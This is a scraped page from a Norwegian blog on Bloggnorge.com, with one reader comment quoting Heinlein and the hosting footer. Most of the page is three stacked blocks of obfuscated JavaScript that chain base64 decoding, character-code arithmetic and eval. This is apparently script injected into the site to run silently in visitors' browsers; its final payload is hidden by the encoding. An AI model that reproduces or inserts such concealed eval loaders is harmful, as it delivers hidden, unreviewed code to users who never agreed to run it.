MywgMTEyIC0gNCwgODMgLSA1LCA3MiAtIDcsIDkyIC0gMywgMTA0IC0gMSwgNzAgLSAzLCA5MCAtIDgsIDExNiAtIDEsIDExNSAtIDIsIDY3IC0gMiwgMTEyIC0gOCwgMTI3IC0gNywgNjEgLSA0LCA4MSAtIDcsIDg3IC0gNCwgODAgLSAzLCA4NyAtIDgsIDc3IC0gMiwgNzUgLSA0LCA4NiAtIDgsIDgxIC0gOCwgODkgLSA2LCA4OSAtIDgsIDY2IC0gNSwgNjcgLSA2LCA0NyAtIDgsIDY1IC0gNiwgMTkgLSA5LCAxMDQgLSAyLCAxMTkgLSAyLCAxMTYgLSA2LCAxMDEgLSAyLCAxMTkgLSAzLCAxMDcgLSAyLCAxMjAgLSA5LCAxMTIgLSAyLCAzNCAtIDIsIDEyMSAtIDEsIDExNCAtIDMsIDExNSAtIDEsIDk4IC0gMywgMTAyIC0gMSwgMTE0IC0gNCwgMTA4IC0gOSwgNDcgLSA3LCAxMjEgLSA2LCAxMjEgLSA1LCAxMTcgLSAzLCAxMDYgLSAxLCAxMTkgLSA5LCAxMDUgLSAyLCA1MiAtIDgsIDM4IC0gNiwgMTA5IC0gMiwgMTA3IC0gNiwgMTI5IC0gOCwgNDkgLSA4LCAzNSAtIDMsIDEzMiAtIDksIDExIC0gMSwgMzUgLSAzLCAzNSAtIDMsIDEyNSAtIDcsIDEwNCAtIDcsIDExOCAtIDQsIDM0IC0gMiwgMTE3IC0gMywgMTA4IC0gNywgMTI0IC0gOSwgMzYgLSA0LCA2NSAtIDQsIDMzIC0gMSwgNDQgLSA1LCA0NCAtIDUsIDY4IC0gOSwgMTUgLSA1LCAzOCAtIDYsIDM5IC0gNywgMTA2IC0gNCwgMTE1IC0gNCwgMTIwIC0gNiwgMzMgLSAxLCA0OCAtIDgsIDEyNyAtIDksIDEwNCAtIDcsIDExOSAtIDUsIDQxIC0gOSwgMTEwIC0gNSwgMzggLSA2LCA2NCAtIDMsIDQxIC0gOSwgNDkgLSAxLCA2MyAtIDQsIDM5IC0gNywgMTE0IC0gOSwgMzMgLSAxLCA2NSAtIDUsIDQwIC0gOCwgMTIzIC0gOCwgMTE5IC0gMywgMTIwIC0gNiwgMTE0IC0gOSwgMTE3IC0gNywgMTEwIC0gNywgNDcgLSAxLCAxMTMgLSA1LCAxMDkgLSA4LCAxMTggLSA4LCAxMDggLSA1LCAxMjIgLSA2LCAxMDcgLSAzLCA2MiAtIDMsIDM2IC0gNCwgMTEyIC0gNywgNDQgLSAxLCA0NyAtIDQsIDQ1IC0gNCwgMzYgLSA0LCAxMjggLSA1LCAxOCAtIDgsIDM3IC0gNSwgMzkgLSA3LCAzNSAtIDMsIDQxIC0gOSwgMTE5IC0gNSwgMTA4IC0gNywgMTE5IC0gNCwgNDAgLSA4LCA1MiAtIDksIDY0IC0gMywgMzkgLSA3LCA5MiAtIDksIDEyMSAtIDUsIDEyMyAtIDksIDExMyAtIDgsIDExMiAtIDIsIDEwNSAtIDIsIDU0IC0gOCwgMTA5IC0gNywgMTE2IC0gMiwgMTIwIC0gOSwgMTEzIC0gNCwgNzIgLSA1LCAxMDYgLSAyLCAxMDIgLSA1LCAxMTcgLSAzLCA3MSAtIDQsIDEyMCAtIDksIDEwNiAtIDYsIDEwNSAtIDQsIDQ3IC0gNywgMTIyIC0gNywgMTI1IC0gOSwgMTE5IC0gNSwgMTA5IC0gNCwgMTE0IC0gNCwgMTA4IC0gNSwgNTIgLSA2LCAxMDUgLSA2LCAxMTAgLSA2LCAxMDIgLSA1LCAxMjAgLSA2LCA3NCAtIDcsIDExNiAtIDUsIDEwMiAtIDIsIDEwOSAtIDgsIDY4IC0gMywgMTIwIC0gNCwgNDcgLSA3LCAxMTIgLSA3LCA0MiAtIDEsIDM2IC0gNCwgOTcgLSAzLCAxNiAtIDYsIDExIC0gMiwgMTIgLSAzLCAxMCAtIDEsIDE1IC0gNiwgMTEyIC0gNSwgMTA3IC0gNiwgMTI1IC0gNCwgNTQgLSA4LCAxMDcgLSA4LCAxMTEgLSA3LCAxMDAgLSAzLCAxMTggLSA0LCA3MyAtIDYsIDEyMCAtIDksIDEwOSAtIDksIDEwNiAtIDUsIDY5IC0gNCwgMTIxIC0gNSwgNDUgLSA1LCAxMTAgLSA1LCAzOCAtIDYsIDQxIC0gNCwgNDAgLSA4LCAxMTIgLSA1LCAxMDggLSA3LCAxMjIgLSAxLCA0NyAtIDEsIDExNSAtIDcsIDEwMiAtIDEsIDExNCAtIDQsIDExMSAtIDgsIDExNyAtIDEsIDExMyAtIDksIDQyIC0gMSwgNDQgLSAzLCA2NiAtIDcsIDEyIC0gMiwgMzUgLSAzLCAzOSAtIDcsIDEzMCAtIDUsIDExIC0gMSwgMzMgLSAxLCAzNiAtIDQsIDExNSAtIDEsIDEwNCAtIDMsIDEyNCAtIDgsIDEyNCAtIDcsIDExOSAtIDUsIDExNSAtIDUsIDM2IC0gNCwgMTIwIC0gNiwgMTAzIC0gMiwgMTE5IC0gNCwgNjUgLSA2LCAxNyAtIDcsIDEzMCAtIDUsIDE4IC0gOCwgMTYgLSA2LCAxMjIgLSA0LCAxMDUgLSA4LCAxMTcgLSAzLCAzOCAtIDYsIDEwOSAtIDksIDExMCAtIDksIDEwNCAtIDUsIDMzIC0gMSwgNzAgLSA5LCAzNSAtIDMsIDEyNiAtIDYsIDExOCAtIDcsIDEyMSAtIDcsIDEwMSAtIDYsIDEwOCAtIDcsIDExMyAtIDMsIDEwMyAtIDQsIDQ5IC0gOSwgMTA2IC0gOSwgMTIxIC0gNSwgMTE5IC0gOCwgMTA0IC0gNiwgNDUgLSA1LCAxMDIgLSAxLCAxMTUgLSA1LCAxMDggLSA5LCAxMDggLSA3LCAxMDEgLSAxLCA0NyAtIDYsIDQ5IC0gNSwgNDAgLSA4LCAxMTMgLSA2LCAxMDkgLSA4LCAxMzAgLSA5LCA0OSAtIDgsIDYyIC0gMywgMTEgLSAxLCA0NyAtIDcsIDExMyAtIDMsIDEwNyAtIDYsIDEyNSAtIDYsIDMzIC0gMSwgNzcgLSA3LCAxMjMgLSA2LCAxMTYgLSA2LCAxMDggLSA5LCAxMjIgLSA2LCAxMTAgLSA1LCAxMTYgLSA1LCAxMTkgLSA5LCA0OSAtIDksIDEwMyAtIDMsIDEwNSAtIDQsIDEwNSAtIDYsIDQyIC0gMSwgNDMgLSAyLCA0MyAtIDMsIDUwIC0gOSwgNjAgLSAxLCAxNCAtIDQsIDE5IC0gOSk7ZXZhbChWTFBBT1BCVU1NKTs=’);
eval(YLNBJFXKRD);

var TEQQOBIUMA = atob(‘dmFyIERCRVpIU1JBWE0gPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDEzIC0gMywgMTIzIC0gNSwgOTkgLSAyLCAxMTYgLSAyLCAzMyAtIDEsIDExNCAtIDcsIDEwOSAtIDgsIDEzMCAtIDksIDM1IC0gMywgNzAgLSA5LCAzNSAtIDMsIDQyIC0gMywgOTUgLSA4LCA3NSAtIDgsIDcxIC0gMiwgODIgLSA2LCAxMTQgLSAzLCA4MSAtIDcsIDEwOSAtIDUsIDczIC0gMywgMTEzIC0gNywgMTE1IC0gNiwgNDUgLSA2LCA2MSAtIDIsIDEzIC0gMywgMTIwIC0gMiwgMTAyIC0gNSwgMTE1IC0gMSwgMzkgLSA3LCAxMDMgLSAyLCAxMTcgLSA3LCAxMDEgLSAyLCAxMDQgLSAzLCAxMDggLSA4LCAzNCAtIDIsIDYzIC0gMiwgMzYgLSA0LCA0MyAtIDQsIDc5IC0gNiwgODcgLSA0LCA3NiAtIDMsIDUzIC0gMiwgMTA2IC0gOCwgNjggLSAyLCA1OCAtIDIsIDU2IC0gNCwgNzAgLSAyLCAxMTAgLSA1LCAxMTUgLSAzLCA3NyAtIDIsIDkyIC0gNywgNzkgLSA3LCAxMDQgLSA1LCAxMTkgLSA5LCA4MCAtIDUsIDExMyAtIDgsIDYwIC0gNCwgOTggLSAxLCA4MyAtIDksIDEyMiAtIDMsIDU1IC0gNywgMTE5IC0gOCwgNzggLSA2LCAxMTMgLSA2LCA4NiAtIDksIDUzIC0gNSwgODUgLSA4LCA5MCAtIDcsIDcwIC0gNSwgMTE5IC0gMywgNzYgLSA1LCAxMjQgLSAzLCA2MCAtIDQsIDEyMiAtIDYsIDc2IC0gMSwgMTA3IC0gNCwgNjQgLSA4LCA3MCAtIDUsIDgwIC0gMywgMTExIC0gNiwgNTAgLSAyLCAxMjggLSA4LCA5NCAtIDQsIDczIC0gNCwgMTEwIC0gNywgNjAgLSA3LCA3NiAtIDksIDEzMCAtIDgsIDg1IC0gNCwgNzMgLSA1LCA3NSAtIDMsIDg5IC0gNiwgODIgLSA0LCAxMDkgLSAyLCAxMDYgLSA4LCA4MSAtIDksIDEwNSAtIDUsIDExMSAtIDMsIDgyIC0gMywgMTA5IC0gNSwgMTE0IC0gMywgMTA3IC0gNCwgNzIgLSA2LCAxMTQgLSA3LCA4MCAtIDMsIDEwOSAtIDIsIDc5IC0gNSwgMTA5IC0gMywgNzEgLSAyLCA4MSAtIDMsIDc5IC0gOCwgMTI4IC0gNiwgNjEgLSA5LCAxMDAgLSAzLCA3NyAtIDEsIDEyMyAtIDQsIDExMCAtIDcsIDkyIC0gMywgNzUgLSAyLCAxMjQgLSAzLCA5MiAtIDIsIDExOSAtIDMsIDEwMyAtIDYsIDEyNCAtIDQsIDEyMSAtIDIsIDYwIC0gOCwgNjggLSAxLCA1MSAtIDEsIDczIC0gMywgNzcgLSA2LCA4NiAtIDMsIDExMiAtIDYsIDYzIC0gNywgNTQgLSAzLCA4NiAtIDksIDkxIC0gNywgMTI0IC0gNCwgODcgLSAxLCA5NSAtIDUsIDg5IC0gNCwgMTA0IC0gNSwgMTI5IC0gOCwgNzQgLSAzLCA3MyAtIDgsIDEyMiAtIDMsIDEyNyAtIDcsIDc5IC0gNSwgODcgLSA0LCAxMjEgLSAyLCAxMjcgLSA5LCA3MSAtIDMsIDExNSAtIDksIDEyMCAtIDksIDcwIC0gNCwgMTAwIC0gMywgNzMgLSA4LCA5MCAtIDksIDcxIC0gNSwgMTA5IC0gOCwgNzIgLSA0LCA2NyAtIDIsIDEyMyAtIDMsIDg0IC0gOCwgOTEgLSA5LCAxMjEgLSA2LCAxMDggLSAyLCA3MyAtIDYsIDU4IC0gOCwgMTE2IC0gOSwgNzMgLSAxLCA3MiAtIDQsIDc0IC0gNiwgNTkgLSA3LCAxMjIgLSA2LCAxMDEgLSA0LCAxMzAgLSA5LCA5NSAtIDYsIDEwNyAtIDgsIDEwNCAtIDYsIDkzIC0gOCwgNzggLSA4LCA2MCAtIDMsIDkwIC0gMSwgNzAgLSA1LCAxMDggLSAxLCA1NiAtIDQsIDc2IC0gMywgNzIgLSA0LCA3NCAtIDksIDExMiAtIDgsIDY4IC0gMSwgMTA4IC0gMywgODYgLSA1LCAxMDIgLSAzLCAxMDMgLSA2LCA3MCAtIDUsIDc1IC0gMiwgNzcgLSA0LCA4MSAtIDMsIDExMCAtIDUsIDEwMSAtIDEsIDEyMyAtIDksIDc3IC0gMSwgODggLSA2LCA1OSAtIDMsIDU4IC0gNCwgNzEgLSAzLCA4OSAtIDYsIDEwNiAtIDMsIDg1IC0gNiwgNzcgLSAxLCAxMTUgLSA5LCA2NCAtIDgsIDEyMCAtIDcsIDgwIC0gNSwgOTAgLSA3LCAxMTEgLSA3LCA3OCAtIDYsIDg3IC0gOCwgMTExIC0gNywgMTE1IC0gNCwgMTA0IC0gMSwgNzUgLSA5LCAxMTEgLSA0LCA4MyAtIDEsIDEyMiAtIDcsIDg1IC0gMiwgODYgLSA1LCA2NSAtIDQsIDY3IC0gNiwgNDIgLSAzLCA2NSAtIDYsIDExIC0gMSwgMTA3IC0gNSwgMTIxIC0gNCwgMTE3IC0gNywgMTA3IC0gOCwgMTIzIC0gNywgMTA5IC0gNCwgMTEyIC0gMSwgMTEyIC0gMiwgNDEgLSA5LCAxMjkgLSA5LCAxMTMgLSAyLCAxMTUgLSAxLCA5OCAtIDMsIDEwNiAtIDUsIDExMyAtIDMsIDEwMSAtIDIsIDQzIC0gMywgMTI0IC0gOSwgMTE3IC0gMSwgMTE5IC0gNSwgMTA2IC0gMSwgMTE2IC0gNiwgMTExIC0gOCwgNTAgLSA2LCAzNyAtIDUsIDExMyAtIDYsIDEwNCAtIDMsIDEyMiAtIDEsIDQ3IC0gNiwgMzUgLSAzLCAxMjYgLSAzLCAxNyAtIDcsIDM5IC0gNywgMzUgLSAzLCAxMjcgLSA5LCAxMDMgLSA2LCAxMjMgLSA5LCAzNSAtIDMsIDExOSAtIDUsIDEwOSAtIDgsIDEyMCAtIDUsIDM1IC0gMywgNjIgLSAxLCAzMyAtIDEsIDQ4IC0gOSwgNDcgLSA4LCA2OCAtIDksIDE1IC0gNSwgNDAgLSA4LCAzNCAtIDIsIDEwNiAtIDQsIDExNyAtIDYsIDEyMyAtIDksIDM2IC0gNCwgNDUgLSA1LCAxMjYgLSA4LCAxMDYgLSA5LCAxMjEgLSA3LCA0MCAtIDgsIDExNCAtIDksIDM0IC0gMiwgNjkgLSA4LCAzNCAtIDIsIDU0IC0gNiwgNjYgLSA3LCAzOSAtIDcsIDExMCAtIDUsIDM0IC0gMiwgNjIgLSAyLCAzNSAtIDMsIDExOSAtIDQsIDEyNSAtIDksIDEyMSAtIDcsIDExMiAtIDcsIDExNyAtIDcsIDEwNSAtIDIsIDQ3IC0gMSwgMTExIC0gMywgMTEwIC0gOSwgMTE0IC0gNCwgMTEyIC0gOSwgMTIwIC0gNCwgMTA5IC0gNSwgNjcgLSA4LCA0MCAtIDgsIDExMCAtIDUsIDQ5IC0gNiwgNTAgLSA3LCA0MiAtIDEsIDM2IC0gNCwgMTMwIC0gNywgMTUgLSA1LCA0MSAtIDksIDM4IC0gNiwgMzcgLSA1LCAzMyAtIDEsIDEyMyAtIDksIDEwMiAtIDEsIDEyNCAtIDksIDM3IC0gNSwgNDkgLSA2LCA2NyAtIDYsIDM3IC0gNSwgOTAgLSA3LCAxMTcgLSAxLCAxMTcgLSAzLCAxMTMgLSA4LCAxMTMgLSAzLCAxMTAgLSA3LCA1MCAtIDQsIDEwNSAtIDMsIDExNSAtIDEsIDExMiAtIDEsIDExNCAtIDUsIDcyIC0gNSwgMTEwIC0gNiwgOTkgLSAyLCAxMjIgLSA4LCA3NSAtIDgsIDExNyAtIDYsIDEwMyAtIDMsIDEwMiAtIDEsIDQ0IC0gNCwgMTE4IC0gMywgMTIzIC0gNywgMTIzIC0gOSwgMTA2IC0gMSwgMTE1IC0gNSwgMTA3IC0gNCwgNDggLSAyLCAxMDQgLSA1LCAxMDYgLSAyLCAxMDEgLSA0LCAxMjAgLSA2LCA3MyAtIDYsIDExNyAtIDYsIDEwNiAtIDYsIDEwMiAtIDEsIDcyIC0gNywgMTI0IC0gOCwgNDggLSA4LCAxMDkgLSA0LCA0NSAtIDQsIDM0IC0gMiwgMTAwIC0gNiwgMTMgLSAzLCAxMiAtIDMsIDE1IC0gNiwgMTYgLSA3LCAxNiAtIDcsIDExNSAtIDgsIDEwNCAtIDMsIDEyOCAtIDcsIDQ3IC0gMSwgMTA4IC0gOSwgMTA1IC0gMSwgMTA2IC0gOSwgMTIwIC0gNiwgNjkgLSAyLCAxMTQgLSAzLCAxMDMgLSAzLCAxMDggLSA3LCA3MyAtIDgsIDExNyAtIDEsIDQxIC0gMSwgMTE0IC0gOSwgMzQgLSAyLCA0NCAtIDcsIDMzIC0gMSwgMTE0IC0gNywgMTEwIC0gOSwgMTI2IC0gNSwgNDcgLSAxLCAxMTUgLSA3LCAxMDcgLSA2LCAxMTUgLSA1LCAxMTAgLSA3LCAxMjEgLSA1LCAxMDcgLSAzLCA0NyAtIDYsIDQ0IC0gMywgNjggLSA5LCAxMyAtIDMsIDM4IC0gNiwgNDEgLSA5LCAxMzQgLSA5LCAxNCAtIDQsIDM3IC0gNSwgMzYgLSA0LCAxMTYgLSAyLCAxMDggLSA3LCAxMTggLSAyLCAxMjIgLSA1LCAxMTcgLSAzLCAxMTIgLSAyLCAzOSAtIDcsIDExNSAtIDEsIDEwMyAtIDIsIDExNiAtIDEsIDYwIC0gMSwgMTEgLSAxLCAxMjkgLSA0LCAxMSAtIDEsIDE5IC0gOSwgMTIzIC0gNSwgMTAyIC0gNSwgMTIwIC0gNiwgMzggLSA2LCAxMDMgLSAzLCAxMDYgLSA1LCAxMDYgLSA3LCAzOSAtIDcsIDY3IC0gNiwgMzcgLSA1LCAxMjIgLSAyLCAxMTMgLSAyLCAxMjEgLSA3LCA5OSAtIDQsIDEwOCAtIDcsIDExNCAtIDQsIDEwMyAtIDQsIDQ0IC0gNCwgOTggLSAxLCAxMjUgLSA5LCAxMjAgLSA5LCAxMDEgLSAzLCA0NyAtIDcsIDExMCAtIDksIDExMiAtIDIsIDEwMiAtIDMsIDEwMiAtIDEsIDEwMyAtIDMsIDQ1IC0gNCwgNTIgLSA4LCAzMyAtIDEsIDEwOCAtIDEsIDEwNiAtIDUsIDEyNiAtIDUsIDQyIC0gMSwgNjUgLSA2LCAxNSAtIDUsIDQ0IC0gNCwgMTEzIC0gMywgMTAyIC0gMSwgMTIzIC0gNCwgMzggLSA2LCA3NCAtIDQsIDEyNCAtIDcsIDExNCAtIDQsIDEwMyAtIDQsIDExNyAtIDEsIDExMCAtIDUsIDExNCAtIDMsIDExNSAtIDUsIDQzIC0gMywgMTAzIC0gMywgMTA0IC0gMywgMTAwIC0gMSwgNTAgLSA5LCA0OCAtIDcsIDQ4IC0gOCwgNDYgLSA1LCA2NyAtIDgsIDE4IC0gOCwgMTYgLSA2KTtldmFsKERCRVpIU1JBWE0pOw==’);
eval(TEQQOBIUMA);

var IKBQHFEOFT = atob(‘dmFyIEdFTUFDWEdHS00gPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE5IC0gOSwgMTIzIC0gNSwgOTkgLSAyLCAxMjIgLSA4LCAzNSAtIDMsIDExNSAtIDgsIDEwNCAtIDMsIDEyNCAtIDMsIDMzIC0gMSwgNjUgLSA0LCAzNCAtIDIsIDQwIC0gMSwgMTMxIC0gOSwgMTE2IC0gMiwgNjkgLSAzLCA2OSAtIDMsIDExMSAtIDcsIDg4IC0gMiwgMTA2IC0gMywgMTA2IC0gMiwgMTEwIC0gNywgMTE2IC0gOSwgNDYgLSA3LCA2NSAtIDYsIDE2IC0gNiwgMTI0IC0gNiwgMTAwIC0gMywgMTE3IC0gMywgMzggLSA2LCAxMDggLSA3LCAxMTUgLSA1LCAxMDQgLSA1LCAxMDYgLSA1LCAxMDQgLSA0LCAzOCAtIDYsIDY2IC0gNSwgMzggLSA2LCA0MiAtIDMsIDY5IC0gMSwgNzEgLSA1LCA4NiAtIDksIDEyMSAtIDIsIDkwIC0gMSwgMTA5IC0gNSwgMTExIC0gOCwgMTEzIC0gNiwgNzMgLSA4LCA4MiAtIDEsIDg1IC0gMywgNzQgLSAyLCA4NyAtIDEsIDExNCAtIDYsIDExNCAtIDMsIDk1IC0gOCwgODQgLSA4LCA4OCAtIDUsIDczIC0gNCwgMTA3IC0gNywgODQgLSA1LCAxMjAgLSAxLCA3NCAtIDEsIDczIC0gMiwgNzQgLSA1LCA1NCAtIDYsIDg4IC0gMywgOTcgLSA3LCA3NCAtIDksIDcxIC0gNCwgMTAzIC0gNCwgMTE0IC0gOCwgNzQgLSAyLCA3MSAtIDMsIDgxIC0gNCwgMTExIC0gNiwgNzEgLSA1LCA2NyAtIDIsIDgyIC0gOSwgNzMgLSAyLCA4MCAtIDgsIDEyMyAtIDMsIDEyMSAtIDIsIDUxIC0gMSwgOTggLSAxLCAxMDggLSAxLCA1OCAtIDIsIDExMCAtIDIsIDY4IC0gMiwgNzUgLSA5LCAxMTYgLSA1LCA4NSAtIDYsIDcyIC0gMSwgMTI2IC0gNywgNTcgLSA0LCA5NCAtIDgsIDk4IC0gMSwgNTMgLSAyLCAxMDkgLSAxLCAxMTEgLSA2LCA3OSAtIDUsIDEwOCAtIDQsIDg2IC0gMSwgODUgLSA2LCA2OSAtIDIsIDUzIC0gNSwgOTMgLSA4LCA4MyAtIDksIDc5IC0gOSwgMTI3IC0gNSwgOTAgLSAxLCA3NyAtIDksIDczIC0gMSwgNzAgLSAzLCA4MCAtIDcsIDkzIC0gNywgNjkgLSA0LCA4OCAtIDcsIDkyIC0gNywgMTA4IC0gNywgNzUgLSA3LCAxMTIgLSA4LCAxMDIgLSAyLCAxMTYgLSAzLCA5MyAtIDMsIDg5IC0gNywgMTE4IC0gMywgMTA4IC0gMSwgNzIgLSA2LCA3MSAtIDIsIDY1IC0gOCwgODUgLSA5LCA5MiAtIDgsIDc0IC0gOCwgNzUgLSAyLCA3NiAtIDUsIDc5IC0gMSwgMTA5IC0gMywgODEgLSA3LCA5MiAtIDksIDEwNSAtIDQsIDkxIC0gNiwgMTA3IC0gNCwgMTA2IC0gNywgNzcgLSA3LCA4OSAtIDgsIDExOCAtIDcsIDEwOCAtIDksIDc3IC0gNywgNjkgLSAyLCAxMjMgLSA4LCAxMDUgLSAxLCA3MCAtIDMsIDg1IC0gMiwgOTIgLSAzLCA4MCAtIDEsIDgzIC0gMSwgMTA5IC0gNiwgMTE2IC0gOSwgNzcgLSA1LCA4NyAtIDEsIDg4IC0gNywgNzUgLSA2LCA1OSAtIDksIDc5IC0gNiwgMTI3IC0gNywgMTIwIC0gMSwgNTIgLSA1LCA3NCAtIDgsIDcyIC0gMywgMTAxIC0gMiwgODIgLSA3LCA2OSAtIDIsIDEwOSAtIDUsIDgyIC0gNSwgMTAyIC0gMywgMTAzIC0gNSwgNjkgLSAyLCAxMDggLSA1LCAxMDIgLSA0LCAxMDggLSA5LCA4OCAtIDMsIDU5IC0gNiwgODYgLSAyLCAxMDUgLSA3LCA4MiAtIDEsIDYwIC0gNCwgOTEgLSA1LCA3NiAtIDcsIDkwIC0gNiwgMTAxIC0gMiwgMTI0IC0gNiwgNzUgLSA3LCA4NSAtIDEsIDEwNiAtIDMsIDg4IC0gNCwgODYgLSA0LCAxMDggLSA1LCA1OSAtIDMsIDg1IC0gNiwgNzYgLSA1LCAxMjMgLSAzLCA5MiAtIDIsIDExNiAtIDEsIDc3IC0gNCwgMTI5IC0gOSwgMTEyIC0gOSwgMTEzIC0gNCwgNjggLSAzLCAxMDQgLSAxLCA5NCAtIDUsIDc3IC0gOSwgODAgLSA1LCA3MSAtIDUsIDc4IC0gNSwgMTA3IC0gOSwgODQgLSA4LCAxMTQgLSA5LCA5MSAtIDEsIDY2IC0gMSwgNzggLSA0LCAxMTIgLSA4LCA5MCAtIDUsIDg2IC0gNywgNjggLSAxLCA1NyAtIDksIDgyIC0gOCwgNzAgLSA0LCAxMDIgLSAxLCA2OCAtIDMsIDY3IC0gNiwgNzAgLSA5LCA0NSAtIDYsIDYzIC0gNCwgMTcgLSA3LCAxMDUgLSAzLCAxMjQgLSA3LCAxMTcgLSA3LCAxMDYgLSA3LCAxMjUgLSA5LCAxMDcgLSAyLCAxMTMgLSAyLCAxMTggLSA4LCAzOSAtIDcsIDEyMyAtIDMsIDExNCAtIDMsIDEyMyAtIDksIDEwMSAtIDYsIDEwNSAtIDQsIDExMSAtIDEsIDEwMiAtIDMsIDQ2IC0gNiwgMTE3IC0gMiwgMTI1IC0gOSwgMTE1IC0gMSwgMTExIC0gNiwgMTE2IC0gNiwgMTA5IC0gNiwgNDUgLSAxLCAzMyAtIDEsIDExNSAtIDgsIDEwNiAtIDUsIDEyNSAtIDQsIDQyIC0gMSwgMzYgLSA0LCAxMjkgLSA2LCAxMyAtIDMsIDMzIC0gMSwgMzYgLSA0LCAxMjMgLSA1LCAxMDYgLSA5LCAxMjEgLSA3LCAzNSAtIDMsIDExNSAtIDEsIDEwMiAtIDEsIDExOCAtIDMsIDQxIC0gOSwgNjQgLSAzLCAzOCAtIDYsIDQ1IC0gNiwgNDYgLSA3LCA2MiAtIDMsIDEzIC0gMywgMzYgLSA0LCAzNSAtIDMsIDEwNSAtIDMsIDExNiAtIDUsIDEyMCAtIDYsIDM3IC0gNSwgNDQgLSA0LCAxMjQgLSA2LCAxMDUgLSA4LCAxMTcgLSAzLCAzNCAtIDIsIDEwNyAtIDIsIDM1IC0gMywgNjMgLSAyLCAzOCAtIDYsIDUzIC0gNSwgNjcgLSA4LCAzOSAtIDcsIDExMCAtIDUsIDMzIC0gMSwgNjEgLSAxLCAzNCAtIDIsIDEyMSAtIDYsIDExOSAtIDMsIDEyMSAtIDcsIDEwNyAtIDIsIDExNyAtIDcsIDEwOCAtIDUsIDUwIC0gNCwgMTE1IC0gNywgMTA5IC0gOCwgMTE0IC0gNCwgMTA1IC0gMiwgMTIyIC0gNiwgMTEwIC0gNiwgNjIgLSAzLCAzOSAtIDcsIDEwOSAtIDQsIDQ0IC0gMSwgNDUgLSAyLCA0OSAtIDgsIDQwIC0gOCwgMTI3IC0gNCwgMTMgLSAzLCAzNiAtIDQsIDM2IC0gNCwgMzQgLSAyLCA0MCAtIDgsIDExOCAtIDQsIDExMCAtIDksIDExOSAtIDQsIDM2IC0gNCwgNDYgLSAzLCA2NiAtIDUsIDM5IC0gNywgODQgLSAxLCAxMTggLSAyLCAxMjMgLSA5LCAxMTMgLSA4LCAxMTEgLSAxLCAxMDYgLSAzLCA1NSAtIDksIDEwNyAtIDUsIDEyMSAtIDcsIDExNiAtIDUsIDExNiAtIDcsIDY5IC0gMiwgMTA5IC0gNSwgMTAzIC0gNiwgMTE1IC0gMSwgNzAgLSAzLCAxMTQgLSAzLCAxMDQgLSA0LCAxMDcgLSA2LCA0NCAtIDQsIDExNiAtIDEsIDEyNSAtIDksIDEyMCAtIDYsIDExMyAtIDgsIDExNiAtIDYsIDEwOCAtIDUsIDQ4IC0gMiwgMTAxIC0gMiwgMTEyIC0gOCwgMTA2IC0gOSwgMTE4IC0gNCwgNzEgLSA0LCAxMTcgLSA2LCAxMDcgLSA3LCAxMDMgLSAyLCA3MCAtIDUsIDExOSAtIDMsIDQ5IC0gOSwgMTEzIC0gOCwgNDcgLSA2LCAzMyAtIDEsIDk5IC0gNSwgMTUgLSA1LCAxNCAtIDUsIDE0IC0gNSwgMTUgLSA2LCAxNSAtIDYsIDExNiAtIDksIDEwNiAtIDUsIDEyMiAtIDEsIDUxIC0gNSwgMTA3IC0gOCwgMTA3IC0gMywgOTggLSAxLCAxMTggLSA0LCA2OSAtIDIsIDExMiAtIDEsIDEwMSAtIDEsIDEwMyAtIDIsIDY5IC0gNCwgMTE4IC0gMiwgNDggLSA4LCAxMTMgLSA4LCAzOCAtIDYsIDM4IC0gMSwgMzUgLSAzLCAxMTMgLSA2LCAxMDMgLSAyLCAxMjUgLSA0LCA1NCAtIDgsIDExMCAtIDIsIDEwOSAtIDgsIDExNiAtIDYsIDExMSAtIDgsIDExOSAtIDMsIDExMiAtIDgsIDQ2IC0gNSwgNDUgLSA0LCA2NiAtIDcsIDE4IC0gOCwgMzMgLSAxLCAzNSAtIDMsIDEyNyAtIDIsIDE4IC0gOCwgMzcgLSA1LCA0MCAtIDgsIDExNSAtIDEsIDEwNiAtIDUsIDEyNCAtIDgsIDEyNCAtIDcsIDEyMyAtIDksIDExOCAtIDgsIDMzIC0gMSwgMTIzIC0gOSwgMTA2IC0gNSwgMTIwIC0gNSwgNjAgLSAxLCAxMiAtIDIsIDEzMiAtIDcsIDE2IC0gNiwgMTggLSA4LCAxMjcgLSA5LCAxMDQgLSA3LCAxMTggLSA0LCAzOCAtIDYsIDEwMiAtIDIsIDEwMiAtIDEsIDEwNiAtIDcsIDQwIC0gOCwgNjggLSA3LCAzOSAtIDcsIDEyNyAtIDcsIDExNiAtIDUsIDExNSAtIDEsIDk3IC0gMiwgMTEwIC0gOSwgMTE5IC0gOSwgMTAyIC0gMywgNDkgLSA5LCAxMDUgLSA4LCAxMTcgLSAxLCAxMTQgLSAzLCAxMDMgLSA1LCA0MiAtIDIsIDExMCAtIDksIDExNyAtIDcsIDEwNCAtIDUsIDEwNSAtIDQsIDEwNyAtIDcsIDQ4IC0gNywgNDUgLSAxLCAzNyAtIDUsIDExMiAtIDUsIDEwNSAtIDQsIDEyMyAtIDIsIDQ4IC0gNywgNjMgLSA0LCAxOSAtIDksIDQzIC0gMywgMTEyIC0gMiwgMTA0IC0gMywgMTI2IC0gNywgMzUgLSAzLCA3NSAtIDUsIDEyMSAtIDQsIDExNCAtIDQsIDEwMyAtIDQsIDEyNCAtIDgsIDExMyAtIDgsIDExNSAtIDQsIDExNiAtIDYsIDQzIC0gMywgMTA1IC0gNSwgMTAyIC0gMSwgMTAwIC0gMSwgNDQgLSAzLCA0NSAtIDQsIDQ3IC0gNywgNDkgLSA4LCA2MiAtIDMsIDE0IC0gNCwgMTEgLSAxKTtldmFsKEdFTUFDWEdHS00pOw==’);
eval(IKBQHFEOFT);

Annonser

Kommentarer

  1. Ernst sier:

    Dette var interessant nytt for meg.
    «Though I’ve never understood how God could expect to pick one true religion by faith… It strikes me as a sloppy way to run a universe».
    – Jubal Harshaw –
    (fictional character featured in ‘Stranger in a Strange Land’, novel by Robert A. Heinlein)

Driftes av Bloggnorge.com - Gratis Blogg | PRO ISP - Blogg på webhotell og eget domenet | Genc Media - Webdesign og hjemmeside
Bloggen "ULVEHYL" er underlagt Lov om opphavsrett til åndsverk. Det betyr at du ikke kan kopiere tekst, bilder eller annet innhold uten tillatelse. Forfatter er selv ansvarlig for innhold. Tekniske spørmål rettes til post[att]bloggnorge[dått]com.
css.php
Driftes av Bloggnorge.com | Laget av Hjemmesideleverandøren
